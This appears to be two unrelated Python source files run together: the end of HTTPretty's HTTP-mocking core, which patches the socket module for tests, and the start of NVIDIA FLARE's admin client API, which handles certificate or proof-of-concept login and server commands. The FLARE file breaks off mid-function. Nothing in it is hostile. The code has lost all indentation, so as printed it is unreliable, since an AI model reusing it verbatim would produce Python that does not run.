forcing_headers=entry.forcing_headers)
# Attach more info to the entry
# So the callback can be more clever about what to do
# This does also fix the case where the callback
# would be handed a compiled regex as uri instead of the
# real uri
new_entry.info = info
new_entry.request = request
return new_entry
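    # A minimal sketch of the rotation implemented above: when several
    # responses are registered for one URI, each request consumes the next
    # entry and the last one repeats once the list is exhausted.
    #
    #   >>> httpretty.register_uri(
    #   ...     httpretty.GET, 'https://example.com/status',
    #   ...     responses=[
    #   ...         httpretty.Response(body='first', status=202),
    #   ...         httpretty.Response(body='second', status=200),
    #   ...     ])
    #   # 1st GET -> 202 'first'; 2nd GET -> 200 'second';
    #   # every later GET -> 200 'second'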
def __hash__(self):
return hash(str(self))
def __eq__(self, other):
return str(self) == str(other)
class httpretty(HttpBaseClass):
"""manages HTTPretty's internal request/response registry and request matching.
"""
_entries = {}
latest_requests = []
last_request = HTTPrettyRequestEmpty()
_is_enabled = False
allow_net_connect = True
@classmethod
def match_uriinfo(cls, info):
"""
:param info: an :py:class:`~httpretty.core.URIInfo`
:returns: a 2-item tuple: (:py:class:`~httpretty.core.URLMatcher`, :py:class:`~httpretty.core.URIInfo`) or ``(None, [])``
"""
items = sorted(
cls._entries.items(),
key=lambda matcher_entries: matcher_entries[0].priority,
reverse=True,
)
for matcher, value in items:
if matcher.matches(info):
return (matcher, info)
return (None, [])
@classmethod
def match_https_hostname(cls, hostname):
"""
:param hostname: a string
:returns: an :py:class:`~httpretty.core.URLMatcher` or ``None``
"""
items = sorted(
cls._entries.items(),
key=lambda matcher_entries: matcher_entries[0].priority,
reverse=True,
)
for matcher, value in items:
if matcher.info is None:
pattern_with_port = "https://{0}:".format(hostname)
pattern_without_port = "https://{0}/".format(hostname)
hostname_pattern = (
hostname_re
.match(matcher.regex.pattern)
.group(0)
)
for pattern in [pattern_with_port, pattern_without_port]:
if re.match(hostname_pattern, pattern):
return matcher
elif matcher.info.hostname == hostname:
return matcher
return None
@classmethod
def match_http_address(cls, hostname, port):
"""
:param hostname: a string
:param port: an integer
:returns: an :py:class:`~httpretty.core.URLMatcher` or ``None``
"""
items = sorted(
cls._entries.items(),
key=lambda matcher_entries: matcher_entries[0].priority,
reverse=True,
)
for matcher, value in items:
if matcher.info is None:
if port in POTENTIAL_HTTPS_PORTS:
scheme = 'https://'
else:
scheme = 'http://'
pattern_without_port = "{0}{1}/".format(scheme, hostname)
pattern_with_port = "{0}{1}:{2}/".format(scheme, hostname, port)
hostname_pattern = (
hostname_re
.match(matcher.regex.pattern)
.group(0)
)
for pattern in [pattern_with_port, pattern_without_port]:
if re.match(hostname_pattern, pattern):
return matcher
elif matcher.info.hostname == hostname \
and matcher.info.port == port:
return matcher
return None
@classmethod
@contextlib.contextmanager
def record(cls, filename, indentation=4, encoding='utf-8'):
"""
.. testcode::
import io
import json
import requests
import httpretty
with httpretty.record('/tmp/ip.json'):
data = requests.get('https://httpbin.org/ip').json()
with io.open('/tmp/ip.json') as fd:
assert data == json.load(fd)
:param filename: a string
:param indentation: an integer, defaults to **4**
:param encoding: a string, defaults to **"utf-8"**
:returns: a `context-manager <https://docs.python.org/3/reference/datamodel.html#context-managers>`_
"""
try:
import urllib3
except ImportError:
msg = (
'HTTPretty requires urllib3 installed '
'for recording actual requests.'
)
raise RuntimeError(msg)
http = urllib3.PoolManager()
cls.enable()
calls = []
def record_request(request, uri, headers):
cls.disable()
kw = {}
kw.setdefault('body', request.body)
kw.setdefault('headers', dict(request.headers))
response = http.request(request.method, uri, **kw)
calls.append({
'request': {
'uri': uri,
'method': request.method,
'headers': dict(request.headers),
'body': decode_utf8(request.body),
'querystring': request.querystring
},
'response': {
'status': response.status,
'body': decode_utf8(response.data),
# urllib3 1.10 had a bug if you just did:
# dict(response.headers)
# which would cause all the values to become lists
# with the header name as the first item and the
# true value as the second item. Workaround that
'headers': dict(response.headers.items())
}
})
cls.enable()
return response.status, response.headers, response.data
for method in cls.METHODS:
cls.register_uri(method, MULTILINE_ANY_REGEX, body=record_request)
yield
cls.disable()
with codecs.open(filename, 'w', encoding) as f:
f.write(json.dumps(calls, indent=indentation))
@classmethod
@contextlib.contextmanager
def playback(cls, filename):
"""
.. testcode::
import io
import json
import requests
import httpretty
with httpretty.record('/tmp/ip.json'):
data = requests.get('https://httpbin.org/ip').json()
with io.open('/tmp/ip.json') as fd:
assert data == json.load(fd)
:param filename: a string
:returns: a `context-manager <https://docs.python.org/3/reference/datamodel.html#context-managers>`_
"""
cls.enable()
        with open(filename) as f:
            data = json.load(f)
for item in data:
uri = item['request']['uri']
method = item['request']['method']
body = item['response']['body']
headers = item['response']['headers']
cls.register_uri(method, uri, body=body, forcing_headers=headers)
yield
cls.disable()
@classmethod
def reset(cls):
"""resets the internal state of HTTPretty, unregistering all URLs
"""
POTENTIAL_HTTP_PORTS.intersection_update(DEFAULT_HTTP_PORTS)
POTENTIAL_HTTPS_PORTS.intersection_update(DEFAULT_HTTPS_PORTS)
cls._entries.clear()
cls.latest_requests = []
cls.last_request = HTTPrettyRequestEmpty()
@classmethod
def historify_request(cls, headers, body='', append=True):
"""appends request to a list for later retrieval
.. testcode::
import httpretty
httpretty.register_uri(httpretty.GET, 'https://httpbin.org/ip', body='')
with httpretty.enabled():
requests.get('https://httpbin.org/ip')
assert httpretty.latest_requests[-1].url == 'https://httpbin.org/ip'
"""
request = HTTPrettyRequest(headers, body)
cls.last_request = request
if append or not cls.latest_requests:
cls.latest_requests.append(request)
else:
cls.latest_requests[-1] = request
return request
@classmethod
def register_uri(cls, method, uri, body='{"message": "HTTPretty :)"}',
adding_headers=None,
forcing_headers=None,
status=200,
responses=None,
match_querystring=False,
priority=0,
**headers):
"""
.. testcode::
import httpretty
def request_callback(request, uri, response_headers):
content_type = request.headers.get('Content-Type')
assert request.body == '{"nothing": "here"}', 'unexpected body: {}'.format(request.body)
assert content_type == 'application/json', 'expected application/json but received Content-Type: {}'.format(content_type)
return [200, response_headers, json.dumps({"hello": "world"})]
httpretty.register_uri(
HTTPretty.POST, "https://httpretty.example.com/api",
body=request_callback)
with httpretty.enabled():
requests.post('https://httpretty.example.com/api', data='{"nothing": "here"}', headers={'Content-Type': 'application/json'})
assert httpretty.latest_requests[-1].url == 'https://httpretty.example.com/api'
:param method: one of ``httpretty.GET``, ``httpretty.PUT``, ``httpretty.POST``, ``httpretty.DELETE``, ``httpretty.HEAD``, ``httpretty.PATCH``, ``httpretty.OPTIONS``, ``httpretty.CONNECT``
:param uri: a string or regex pattern (e.g.: **"https://httpbin.org/ip"**)
:param body: a string, defaults to ``{"message": "HTTPretty :)"}``
:param adding_headers: dict - headers to be added to the response
:param forcing_headers: dict - headers to be forcefully set in the response
:param status: an integer, defaults to **200**
:param responses: a list of entries, ideally each created with :py:meth:`~httpretty.core.httpretty.Response`
:param priority: an integer, useful for setting higher priority over previously registered urls. defaults to zero
:param match_querystring: bool - whether to take the querystring into account when matching an URL
:param headers: headers to be added to the response
.. warning:: When using a port in the request, add a trailing slash if no path is provided, otherwise HTTPretty will not catch the request. Ex: ``httpretty.register_uri(httpretty.GET, 'http://fakeuri.com:8080/', body='{"hello":"world"}')``
"""
uri_is_string = isinstance(uri, str)
if uri_is_string and re.search(r'^\w+://[^/]+[.]\w{2,}$', uri):
uri += '/'
if isinstance(responses, list) and len(responses) > 0:
for response in responses:
response.uri = uri
response.method = method
entries_for_this_uri = responses
else:
headers['body'] = body
headers['adding_headers'] = adding_headers
headers['forcing_headers'] = forcing_headers
headers['status'] = status
entries_for_this_uri = [
cls.Response(method=method, uri=uri, **headers),
]
matcher = URIMatcher(uri, entries_for_this_uri,
match_querystring, priority)
if matcher in cls._entries:
matcher.entries.extend(cls._entries[matcher])
del cls._entries[matcher]
cls._entries[matcher] = entries_for_this_uri
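    # Illustrative sketch (an editorial addition; the URL and bodies are assumptions):
    # passing ``responses`` rotates through several entries on successive requests to
    # the same URI.
    #
    #     httpretty.register_uri(
    #         httpretty.GET, 'https://example.test/jobs',
    #         responses=[
    #             httpretty.Response(body='{"status": "pending"}', status=202),
    #             httpretty.Response(body='{"status": "done"}', status=200),
    #         ])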
def __str__(self):
return '<HTTPretty with %d URI entries>' % len(self._entries)
@classmethod
def Response(
cls, body,
method=None,
uri=None,
adding_headers=None,
forcing_headers=None,
status=200,
streaming=False,
**kw):
"""Shortcut to create an :py:class:`~httpretty.core.Entry` that takes
the body as first positional argument.
.. seealso:: the parameters of this function match those of
the :py:class:`~httpretty.core.Entry` constructor.
Args:
body (str): The body to return as the response.
method (str): One of ``httpretty.GET``, ``httpretty.PUT``, ``httpretty.POST``, ``httpretty.DELETE``, ``httpretty.HEAD``, ``httpretty.PATCH``, ``httpretty.OPTIONS``, ``httpretty.CONNECT``.
uri (str|re.Pattern): The URL to match
adding_headers (dict): Extra headers to be added to the response
forcing_headers (dict): Overwrite **any** response headers, even "Content-Length".
status (int): The status code for the response, defaults to ``200``.
streaming (bool): Whether the response should be streamed in chunks via a generator.
kwargs: Keyword-arguments are forwarded to :py:class:`~httpretty.core.Entry`
Returns:
httpretty.Entry: containing the request-matching metadata.
"""
kw['body'] = body
kw['adding_headers'] = adding_headers
kw['forcing_headers'] = forcing_headers
kw['status'] = int(status)
kw['streaming'] = streaming
return Entry(method, uri, **kw)
@classmethod
def disable(cls):
"""Disables HTTPretty entirely, putting the original :py:mod:`socket`
module back in its place.
.. code::
import requests
import httpretty
httpretty.enable()
# request passes through fake socket
response = requests.get('https://httpbin.org')
httpretty.disable()
# request uses real python socket module
response = requests.get('https://httpbin.org')
.. note:: This method does not call :py:meth:`httpretty.core.reset` automatically.
"""
undo_patch_socket()
cls._is_enabled = False
@classmethod
def is_enabled(cls):
"""Check if HTTPretty is enabled
:returns: bool
.. testcode::
import httpretty
httpretty.enable()
assert httpretty.is_enabled() == True
httpretty.disable()
assert httpretty.is_enabled() == False
"""
return cls._is_enabled
@classmethod
def enable(cls, allow_net_connect=True):
"""Enables HTTPretty.
When ``allow_net_connect`` is ``False`` any connection to an unregistered uri will throw :py:class:`httpretty.errors.UnmockedError`.
.. testcode::
import re, json
import requests
import httpretty
httpretty.enable()
httpretty.register_uri(
httpretty.GET,
re.compile(r'http://.*'),
body=json.dumps({'man': 'in', 'the': 'middle'})
)
response = requests.get('https://foo.bar/foo/bar')
response.json().should.equal({
"man": "in",
"the": "middle",
})
.. warning:: after calling this method the original :py:mod:`socket` is replaced with :py:class:`httpretty.core.fakesock`. Make sure to call :py:meth:`~httpretty.disable` once you are done with your tests, or use :py:class:`httpretty.enabled` as a decorator or `context-manager <https://docs.python.org/3/reference/datamodel.html#context-managers>`_
"""
cls.allow_net_connect = allow_net_connect
apply_patch_socket()
cls._is_enabled = True
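# Minimal sketch (an editorial addition, not part of the original source; the URL is
# an assumption): with allow_net_connect=False a request to an unregistered URI is
# rejected with httpretty.errors.UnmockedError instead of reaching the real network.
def _example_strict_mode():  # hypothetical helper, never called by the library
    import requests
    httpretty.enable(allow_net_connect=False)
    try:
        try:
            requests.get('https://not-registered.example/')
        except Exception:
            # requests surfaces the underlying UnmockedError as a ConnectionError
            pass
    finally:
        httpretty.disable()
        httpretty.reset()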
def apply_patch_socket():
# Some versions of python internally shadowed the
# SocketType variable incorrectly https://bugs.python.org/issue20386
bad_socket_shadow = (socket.socket != socket.SocketType)
new_wrap = None
socket.socket = fakesock.socket
socket._socketobject = fakesock.socket
if not bad_socket_shadow:
socket.SocketType = fakesock.socket
socket.create_connection = create_fake_connection
socket.gethostname = fake_gethostname
socket.gethostbyname = fake_gethostbyname
socket.getaddrinfo = fake_getaddrinfo
socket.__dict__['socket'] = fakesock.socket
socket.__dict__['_socketobject'] = fakesock.socket
if not bad_socket_shadow:
socket.__dict__['SocketType'] = fakesock.socket
socket.__dict__['create_connection'] = create_fake_connection
socket.__dict__['gethostname'] = fake_gethostname
socket.__dict__['gethostbyname'] = fake_gethostbyname
socket.__dict__['getaddrinfo'] = fake_getaddrinfo
if pyopenssl_override:
# Take out the pyopenssl version - use the default implementation
extract_from_urllib3()
if requests_urllib3_connection is not None:
urllib3_wrap = partial(fake_wrap_socket, old_requests_ssl_wrap_socket)
requests_urllib3_connection.ssl_wrap_socket = urllib3_wrap
requests_urllib3_connection.__dict__['ssl_wrap_socket'] = urllib3_wrap
if eventlet:
eventlet.green.ssl.GreenSSLContext = old_sslcontext_class
eventlet.green.ssl.__dict__['GreenSSLContext'] = old_sslcontext_class
eventlet.green.ssl.SSLContext = old_sslcontext_class
eventlet.green.ssl.__dict__['SSLContext'] = old_sslcontext_class
if socks:
socks.socksocket = fakesock.socket
socks.__dict__['socksocket'] = fakesock.socket
if ssl:
new_wrap = partial(fake_wrap_socket, old_ssl_wrap_socket)
ssl.wrap_socket = new_wrap
ssl.SSLSocket = FakeSSLSocket
ssl.SSLContext = old_sslcontext_class
try:
ssl.SSLContext.wrap_socket = partial(fake_wrap_socket, old_ssl_wrap_socket)
except AttributeError:
pass
ssl.__dict__['wrap_socket'] = new_wrap
ssl.__dict__['SSLSocket'] = FakeSSLSocket
ssl.__dict__['SSLContext'] = old_sslcontext_class
def undo_patch_socket():
socket.socket = old_socket
socket.SocketType = old_SocketType
socket._socketobject = old_socket
socket.create_connection = old_create_connection
socket.gethostname = old_gethostname
socket.gethostbyname = old_gethostbyname
socket.getaddrinfo = old_getaddrinfo
socket.__dict__['socket'] = old_socket
socket.__dict__['_socketobject'] = old_socket
socket.__dict__['SocketType'] = old_SocketType
socket.__dict__['create_connection'] = old_create_connection
socket.__dict__['gethostname'] = old_gethostname
socket.__dict__['gethostbyname'] = old_gethostbyname
socket.__dict__['getaddrinfo'] = old_getaddrinfo
if socks:
socks.socksocket = old_socksocket
socks.__dict__['socksocket'] = old_socksocket
if ssl:
ssl.wrap_socket = old_ssl_wrap_socket
ssl.SSLSocket = old_sslsocket
try:
ssl.SSLContext.wrap_socket = old_sslcontext_wrap_socket
except AttributeError:
pass
ssl.__dict__['wrap_socket'] = old_ssl_wrap_socket
ssl.__dict__['SSLSocket'] = old_sslsocket
if requests_urllib3_connection is not None:
requests_urllib3_connection.ssl_wrap_socket = \
old_requests_ssl_wrap_socket
requests_urllib3_connection.__dict__['ssl_wrap_socket'] = \
old_requests_ssl_wrap_socket
if pyopenssl_override:
# Put the pyopenssl version back in place
inject_into_urllib3()
@contextlib.contextmanager
def restored_libs():
undo_patch_socket()
yield
apply_patch_socket()
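# Illustrative sketch (an editorial addition; the URL is an assumption): restored_libs()
# temporarily puts the original socket module back in place, so a genuine network
# request can be made while HTTPretty is otherwise enabled.
def _example_passthrough_request():  # hypothetical helper, never called by the library
    import requests
    httpretty.enable()
    try:
        with restored_libs():
            # inside this block requests travel over the real network again
            requests.get('https://example.org/')
    finally:
        httpretty.disable()
        httpretty.reset()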
class httprettized(object):
"""`context-manager <https://docs.python.org/3/reference/datamodel.html#context-managers>`_ for enabling HTTPretty.
.. tip:: Also available under the alias :py:func:`httpretty.enabled`
.. testcode::
import json
import requests
import httpretty
httpretty.register_uri(httpretty.GET, 'https://httpbin.org/ip', body=json.dumps({'origin': '42.42.42.42'}))
with httpretty.enabled():
response = requests.get('https://httpbin.org/ip')
assert httpretty.latest_requests[-1].url == 'https://httpbin.org/ip'
assert response.json() == {'origin': '42.42.42.42'}
"""
def __init__(self, allow_net_connect=True):
self.allow_net_connect = allow_net_connect
def __enter__(self):
httpretty.reset()
httpretty.enable(allow_net_connect=self.allow_net_connect)
def __exit__(self, exc_type, exc_value, db):
httpretty.disable()
httpretty.reset()
def httprettified(test=None, allow_net_connect=True):
"""decorator for test functions
.. tip:: Also available under the alias :py:func:`httpretty.activate`
:param test: a callable
example usage with `nosetests <https://nose.readthedocs.io/en/latest/>`_
.. testcode::
import sure
import requests
import httpretty
from httpretty import httprettified
@httprettified
def test_using_nosetests():
httpretty.register_uri(
httpretty.GET,
'https://httpbin.org/ip'
)
response = requests.get('https://httpbin.org/ip')
response.json().should.equal({
"message": "HTTPretty :)"
})
example usage with `unittest module <https://docs.python.org/3/library/unittest.html>`_
.. testcode::
import unittest
import requests
import httpretty
from sure import expect
from httpretty import httprettified
@httprettified
class TestWithPyUnit(unittest.TestCase):
def test_httpbin(self):
httpretty.register_uri(httpretty.GET, 'https://httpbin.org/ip')
response = requests.get('https://httpbin.org/ip')
expect(response.json()).to.equal({
"message": "HTTPretty :)"
})
"""
def decorate_unittest_TestCase_setUp(klass):
# Prefer addCleanup (added in python 2.7), but fall back
# to using tearDown if it isn't available
use_addCleanup = hasattr(klass, 'addCleanup')
original_setUp = (klass.setUp
if hasattr(klass, 'setUp')
else None)
def new_setUp(self):
httpretty.reset()
httpretty.enable(allow_net_connect)
if use_addCleanup:
self.addCleanup(httpretty.disable)
if original_setUp:
original_setUp(self)
klass.setUp = new_setUp
if not use_addCleanup:
original_tearDown = (klass.tearDown
                     if hasattr(klass, 'tearDown')
                     else None)
def new_tearDown(self):
httpretty.disable()
httpretty.reset()
if original_tearDown:
original_tearDown(self)
klass.tearDown = new_tearDown
return klass
def decorate_test_methods(klass):
for attr in dir(klass):
if not attr.startswith('test_'):
continue
attr_value = getattr(klass, attr)
if not hasattr(attr_value, "__call__"):
continue
setattr(klass, attr, decorate_callable(attr_value))
return klass
def is_unittest_TestCase(klass):
try:
import unittest
return issubclass(klass, unittest.TestCase)
except ImportError:
return False
"A decorator for tests that use HTTPretty"
def decorate_class(klass):
if is_unittest_TestCase(klass):
return decorate_unittest_TestCase_setUp(klass)
return decorate_test_methods(klass)
def decorate_callable(test):
@functools.wraps(test)
def wrapper(*args, **kw):
with httprettized(allow_net_connect):
return test(*args, **kw)
return wrapper
if isinstance(test, type):
return decorate_class(test)
elif callable(test):
return decorate_callable(test)
return decorate_callable
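# Illustrative sketch (an editorial addition): because ``test`` is optional, the
# decorator works both bare and with arguments, e.g. to forbid real network access
# while a test runs.
#
#     @httprettified
#     def test_bare():
#         ...
#
#     @httprettified(allow_net_connect=False)
#     def test_strict():
#         ...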
|
api.py
|
# Copyright (c) 2021-2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
import socket
import ssl
import threading
import time
import traceback
from datetime import datetime
from typing import List, Optional
from nvflare.apis.overseer_spec import SP, OverseerAgent
from nvflare.fuel.hci.cmd_arg_utils import split_to_args
from nvflare.fuel.hci.conn import Connection, receive_and_process
from nvflare.fuel.hci.proto import make_error
from nvflare.fuel.hci.reg import CommandModule, CommandRegister
from nvflare.fuel.hci.security import get_certificate_common_name
from nvflare.fuel.hci.table import Table
from nvflare.ha.ha_admin_cmds import HACommandModule
from .api_spec import AdminAPISpec, ReplyProcessor
from .api_status import APIStatus
class _DefaultReplyProcessor(ReplyProcessor):
def process_shutdown(self, api: AdminAPI, msg: str):
api.shutdown_received = True
api.shutdown_msg = msg
class _LoginReplyProcessor(ReplyProcessor):
"""Reply processor for handling login and setting the token for the admin client."""
def process_string(self, api: AdminAPI, item: str):
api.login_result = item
def process_token(self, api: AdminAPI, token: str):
api.token = token
class _CmdListReplyProcessor(ReplyProcessor):
"""Reply processor to register available commands after getting back a table of commands from the server."""
def process_table(self, api: AdminAPI, table: Table):
for i in range(len(table.rows)):
if i == 0:
# this is header
continue
row = table.rows[i]
if len(row) < 5:
return
scope = row[0]
cmd_name = row[1]
desc = row[2]
usage = row[3]
confirm = row[4]
# if confirm == 'auth' and not client.require_login:
# the user is not authenticated - skip this command
# continue
api.server_cmd_reg.add_command(
scope_name=scope,
cmd_name=cmd_name,
desc=desc,
usage=usage,
handler=None,
authz_func=None,
visible=True,
confirm=confirm,
)
api.server_cmd_received = True
class AdminAPI(AdminAPISpec):
def __init__(
self,
host=None,
port=None,
ca_cert: str = "",
client_cert: str = "",
client_key: str = "",
upload_dir: str = "",
download_dir: str = "",
server_cn=None,
cmd_modules: Optional[List] = None,
overseer_agent: OverseerAgent = None,
auto_login: bool = False,
user_name: str = None,
poc: bool = False,
debug: bool = False,
):
"""Underlying API to keep certs, keys and connection information and to execute admin commands through do_command.
Args:
host: cn provisioned for the server, with this fully qualified domain name resolving to the IP of the FL server. This may be set by the OverseerAgent.
port: port provisioned as admin_port for FL admin communication, by default provisioned as 8003, must be int if provided. This may be set by the OverseerAgent.
ca_cert: path to CA Cert file, by default provisioned rootCA.pem
client_cert: path to admin client Cert file, by default provisioned as client.crt
client_key: path to admin client Key file, by default provisioned as client.key
upload_dir: File transfer upload directory. Folders uploaded to the server to be deployed must be here. Folder must already exist and be accessible.
download_dir: File transfer download directory. Can be same as upload_dir. Folder must already exist and be accessible.
server_cn: server cn (only used for validating server cn)
cmd_modules: command modules to load and register. Note that FileTransferModule is initialized here with upload_dir and download_dir if cmd_modules is None.
overseer_agent: initialized OverseerAgent to obtain the primary service provider to set the host and port of the active server
auto_login: Whether to use stored credentials to automatically log in (required to be True with OverseerAgent to provide high availability)
user_name: Username to authenticate with FL server
poc: Whether to enable poc mode for using the proof of concept example without secure communication.
debug: Whether to print debug messages, which can help with diagnosing problems. False by default.
"""
super().__init__()
if cmd_modules is None:
from .file_transfer import FileTransferModule
cmd_modules = [FileTransferModule(upload_dir=upload_dir, download_dir=download_dir)]
elif not isinstance(cmd_modules, list):
raise TypeError("cmd_modules must be a list, but got {}".format(type(cmd_modules)))
else:
for m in cmd_modules:
if not isinstance(m, CommandModule):
raise TypeError(
"cmd_modules must be a list of CommandModule, but got element of type {}".format(type(m))
)
cmd_modules.append(HACommandModule())
self.overseer_agent = overseer_agent
self.host = host
self.port = port
self.poc = poc
if self.poc:
self.poc_key = "admin"
else:
if len(ca_cert) <= 0:
raise Exception("missing CA Cert file name")
self.ca_cert = ca_cert
if len(client_cert) <= 0:
raise Exception("missing Client Cert file name")
self.client_cert = client_cert
if len(client_key) <= 0:
raise Exception("missing Client Key file name")
self.client_key = client_key
if not isinstance(self.overseer_agent, OverseerAgent):
raise Exception("overseer_agent is missing but must be provided for secure context.")
self.overseer_agent.set_secure_context(
ca_path=self.ca_cert, cert_path=self.client_cert, prv_key_path=self.client_key
)
if self.overseer_agent:
self.overseer_agent.start(self._overseer_callback)
self.server_cn = server_cn
self.debug = debug
# for overseer agent
self.ssid = None
# for login
self.token = None
self.login_result = None
if auto_login:
self.auto_login = True
if not user_name:
raise Exception("for auto_login, user_name is required.")
self.user_name = user_name
self.server_cmd_reg = CommandRegister(app_ctx=self)
self.client_cmd_reg = CommandRegister(app_ctx=self)
self.server_cmd_received = False
self.all_cmds = []
self._load_client_cmds(cmd_modules)
# for shutdown
self.shutdown_received = False
self.shutdown_msg = None
self.server_sess_active = False
self.sess_monitor_thread = None
self.sess_monitor_active = False
def _overseer_callback(self, overseer_agent):
sp = overseer_agent.get_primary_sp()
self._set_primary_sp(sp)
def _set_primary_sp(self, sp: SP):
if sp and sp.primary is True:
if self.host != sp.name or self.port != int(sp.admin_port) or self.ssid != sp.service_session_id:
# if needing to log out of previous server, this may be where to issue server_execute("_logout")
self.host = sp.name
self.port = int(sp.admin_port)
self.ssid = sp.service_session_id
print(
f"Got primary SP {self.host}:{sp.fl_port}:{self.port} from overseer. Host: {self.host} Admin_port: {self.port} SSID: {self.ssid}"
)
thread = threading.Thread(target=self._login_sp)
thread.start()
def _login_sp(self):
if not self._auto_login():
print("cannot log in, shutting down...")
self.shutdown_received = True
def _auto_login(self):
try_count = 0
while try_count < 5:
if self.poc:
self.login_with_poc(username=self.user_name, poc_key=self.poc_key)
print(f"login_result: {self.login_result} token: {self.token}")
if self.login_result == "OK":
return True
elif self.login_result == "REJECT":
print("Incorrect key for POC mode.")
return False
else:
print("Communication Error - please try later")
try_count += 1
else:
self.login(username=self.user_name)
if self.login_result == "OK":
return True
elif self.login_result == "REJECT":
print("Incorrect user name or certificate.")
return False
else:
print("Communication Error - please try later")
try_count += 1
time.sleep(1.0)
return False
def _load_client_cmds(self, cmd_modules):
if cmd_modules:
for m in cmd_modules:
self.client_cmd_reg.register_module(m, include_invisible=False)
self.client_cmd_reg.finalize(self.register_command)
def register_command(self, cmd_entry):
self.all_cmds.append(cmd_entry.name)
def start_session_monitor(self, session_ended_callback, interval=5):
if self.sess_monitor_thread and self.sess_monitor_thread.is_alive():
self.close_session_monitor()
self.sess_monitor_thread = threading.Thread(
target=self._check_session, args=(session_ended_callback, interval), daemon=True
)
self.sess_monitor_active = True
self.sess_monitor_thread.start()
def close_session_monitor(self):
self.sess_monitor_active = False
if self.sess_monitor_thread and self.sess_monitor_thread.is_alive():
self.sess_monitor_thread.join()
self.sess_monitor_thread = None
def _check_session(self, session_ended_callback, interval):
error_msg = ""
connection_error_counter = 0
while True:
time.sleep(interval)
if not self.sess_monitor_active:
return
if self.shutdown_received:
error_msg = self.shutdown_msg
break
resp = self.server_execute("_check_session")
status = resp["status"]
connection_error_counter += 1
if status != APIStatus.ERROR_SERVER_CONNECTION:
connection_error_counter = 0
if status in APIStatus.ERROR_INACTIVE_SESSION or (
status in APIStatus.ERROR_SERVER_CONNECTION and connection_error_counter > 60 // interval
):
for item in resp["data"]:
if item["type"] == "error":
error_msg = item["data"]
break
self.server_sess_active = False
session_ended_callback(error_msg)
def logout(self):
"""Send logout command to server."""
resp = self.server_execute("_logout")
self.server_sess_active = False
return resp
def login(self, username: str):
"""Login using certification files and retrieve server side commands.
Args:
username: Username
Returns:
A dict of status and details
"""
self.login_result = None
self._try_command(f"_cert_login {username}", _LoginReplyProcessor())
if self.login_result is None:
return {"status": APIStatus.ERROR_RUNTIME, "details": "Communication Error - please try later"}
elif self.login_result == "REJECT":
return {"status": APIStatus.ERROR_CERT, "details": "Incorrect user name or certificate"}
# get command list from server
self.server_cmd_received = False
self._try_command("_commands", _CmdListReplyProcessor())
self.server_cmd_reg.finalize(self.register_command)
if not self.server_cmd_received:
return {"status": APIStatus.ERROR_RUNTIME, "details": "Communication Error - please try later"}
self.server_sess_active = True
return {"status": APIStatus.SUCCESS, "details": "Login success"}
def login_with_poc(self, username: str, poc_key: str):
"""Login using key for proof of concept example.
Args:
username: Username
poc_key: key used for proof of concept admin login
Returns:
A dict of login status and details
"""
self.login_result = None
self._try_command(f"_login {username} {poc_key}", _LoginReplyProcessor())
if self.login_result is None:
return {"status": APIStatus.ERROR_RUNTIME, "details": "Communication Error - please try later"}
elif self.login_result == "REJECT":
return {"status": APIStatus.ERROR_CERT, "details": "Incorrect user name or certificate"}
# get command list from server
self.server_cmd_received = False
self._try_command("_commands", _CmdListReplyProcessor())
self.server_cmd_reg.finalize(self.register_command)
if not self.server_cmd_received:
return {"status": APIStatus.ERROR_RUNTIME, "details": "Communication Error - please try later"}
self.server_sess_active = True
return {"status": APIStatus.SUCCESS, "details": "Login success"}
def _send_to_sock(self, sock, command, process_json_func):
conn = Connection(sock, self)
conn.append_command(command)
if self.token:
conn.append_token(self.token)
conn.close()
ok = receive_and_process(sock, process_json_func)
if not ok:
process_json_func(
make_error("Failed to communicate with Admin Server {} on {}".format(self.host, self.port))
)
def _process_server_reply(self, resp):
"""Process the server reply and store the status/details into API's `command_result`
Args:
resp: The raw response returned by the server.
"""
if self.debug:
print("DEBUG: Server Reply: {}".format(resp))
# this resp is what is usually directly used to return, straight from server
self.set_command_result(resp)
reply_processor = _DefaultReplyProcessor() if self.reply_processor is None else self.reply_processor
reply_processor.reply_start(self, resp)
if resp is not None:
data = resp["data"]
for item in data:
it = item["type"]
if it == "string":
reply_processor.process_string(self, item["data"])
elif it == "success":
reply_processor.process_success(self, item["data"])
elif it == "error":
reply_processor.process_error(self, item["data"])
break
elif it == "table":
table = Table(None)
table.set_rows(item["rows"])
reply_processor.process_table(self, table)
elif it == "dict":
reply_processor.process_dict(self, item["data"])
elif it == "token":
reply_processor.process_token(self, item["data"])
elif it == "shutdown":
reply_processor.process_shutdown(self, item["data"])
break
else:
reply_processor.protocol_error(self, "Invalid item type: " + it)
break
else:
reply_processor.protocol_error(self, "Protocol Error")
reply_processor.reply_done(self)
def _try_command(self, command, reply_processor):
"""Try to execute a command on server side.
Args:
command: The command to execute.
reply_processor: An instance of ReplyProcessor
"""
# process_json_func can't return data because of how "receive_and_process" is written.
self.reply_processor = reply_processor
process_json_func = self._process_server_reply
try:
if not self.poc:
# SSL communication
ctx = ssl.create_default_context()
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.check_hostname = False
ctx.load_verify_locations(self.ca_cert)
ctx.load_cert_chain(certfile=self.client_cert, keyfile=self.client_key)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
with ctx.wrap_socket(sock) as ssock:
ssock.connect((self.host, self.port))
if self.server_cn:
# validate server CN
cn = get_certificate_common_name(ssock.getpeercert())
if cn != self.server_cn:
process_json_func(
make_error("wrong server: expecting {} but connected {}".format(self.server_cn, cn))
)
return
self._send_to_sock(ssock, command, process_json_func)
else:
# poc without certs
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((self.host, self.port))
self._send_to_sock(sock, command, process_json_func)
except Exception as ex:
if self.debug:
traceback.print_exc()
process_json_func(
make_error("Failed to communicate with Admin Server {} on {}: {}".format(self.host, self.port, ex))
)
def do_command(self, command):
"""A convenient method to call commands using string.
Args:
command (str): command
Returns:
Object containing status and details (or direct response from server, which originally was just time and data)
"""
args = split_to_args(command)
cmd_name = args[0]
self.set_command_result(None)
# check client side commands
entries = self.client_cmd_reg.get_command_entries(cmd_name)
if len(entries) > 1:
return {
"status": APIStatus.ERROR_SYNTAX,
